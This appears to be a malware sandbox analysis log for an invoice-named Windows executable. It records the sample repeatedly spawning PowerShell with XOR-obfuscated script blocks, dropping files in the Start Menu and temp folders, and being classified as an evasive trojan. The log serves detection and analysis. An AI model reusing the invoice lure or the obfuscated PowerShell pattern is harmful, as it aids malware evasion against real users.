Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_00403395

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File created: C:\Users\user\AppData\Local\Temp\nsmC268.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@238/22@1/1

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_00402178 CoCreateInstance,MultiByteToWideChar,

0_2_00402178

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_0040477C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040477C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8724:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9780:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9468:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9844:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10204:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:304:WilStaging_02
